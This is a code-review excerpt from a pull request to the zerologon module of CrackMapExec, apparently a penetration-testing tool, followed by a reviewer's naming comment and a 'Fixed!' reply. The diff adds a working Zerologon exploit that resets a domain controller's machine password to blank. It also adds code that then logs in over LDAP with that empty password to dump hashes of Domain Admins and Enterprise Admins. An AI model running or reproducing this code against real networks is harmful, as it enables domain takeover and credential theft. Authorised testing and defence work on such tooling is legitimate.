cme/modules/zerologon.py

```diff
@@ -43,63 +62,290 @@ def on_login(self, context, connection):
-    # Connect to the DC's Netlogon service.
-
-    # Use an all-zero challenge and credential.
-    plaintext = b"\x00" * 8
-    ciphertext = b"\x00" * 8
-
-    # Standard flags observed from a Windows 10 client (including AES), with only the sign/seal flag disabled.
-    flags = 0x212FFFFF
-
-    # Send challenge and authentication request.
-    nrpc.hNetrServerReqChallenge(rpc_con, dc_handle + "\x00", target_computer + "\x00", plaintext)
-    try:
-        server_auth = nrpc.hNetrServerAuthenticate3(
-            rpc_con,
-            dc_handle + "\x00",
-            target_computer + "$\x00",
-            nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
-            target_computer + "\x00",
-            ciphertext,
-            flags,
+                self.logger.fail(f"Unexpected error code from DC: {ex.get_error_code()}.")
+        except BaseException as ex:
+            self.logger.fail(f"Unexpected error: {str(ex)}.")
+    
+    def zerologon_exploit(self, dce):
+        request = nrpc.NetrServerPasswordSet2()
+        request['PrimaryName'] = self.__dc_handle + '\x00'
+        request['AccountName'] = self.__target_computer + '$\x00'
+        request['SecureChannelType'] = nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel
+        authenticator = nrpc.NETLOGON_AUTHENTICATOR()
+        authenticator['Credential'] = b'\x00' * 8
+        authenticator['Timestamp'] = 0
+        request['Authenticator'] = authenticator
+        request['ComputerName'] = self.__target_computer + '\x00'
+        request['ClearNewPassword'] = b'\x00' * 516
+        return dce.request(request)
+    
+class secretsdump_nano():
+    def __init__(self, logger, connection):
+        self.__remoteName = connection.host
+        self.__remoteHost = connection.host
+        self.__kdcHost = connection.kdcHost
+        self.__dcName = f"{connection.hostname}$"
+        self.__domain = connection.domain
+        self.__outputFileName=connection.output_filename
+        self.__hexpass = ""
+        self.logger = logger
+
+        domainParts = self.__domain.split('.')
+        baseDN = ''
+        for i in domainParts:
+            baseDN += 'dc=%s,' % i
+        # Remove last ','
+        self.__baseDN = baseDN[:-1]
+
+    def NTDSDump_BlankPass(self):
+        
+        creds = []
+        def add_ntds_hash(ntds_hash):
+            creds.append(ntds_hash.split(" ")[0])
+            self.logger.highlight(ntds_hash.split(" ")[0])
+        
+        # Initialize LDAP Connection
+        if self.__kdcHost is None:
+            self.__kdcHost = self.__remoteHost
+
+        ldapConnection = ldap.LDAPConnection(f"ldap://{self.__domain}", self.__baseDN, self.__kdcHost)
+        ldapConnection.login(self.__dcName, '', self.__domain, '', '')
+        searchFilter = f"(&(|(memberof=CN=Domain Admins,CN=Users,{self.__baseDN})(memberof=CN=Enterprise Admins,CN=Users,{self.__baseDN}))(!(userAccountControl:1.2.840.113556.1.4.803:=2)))"
```

Comment:
Variables should be lowercase with underscores, so "search_filter"

Reply:
Fixed!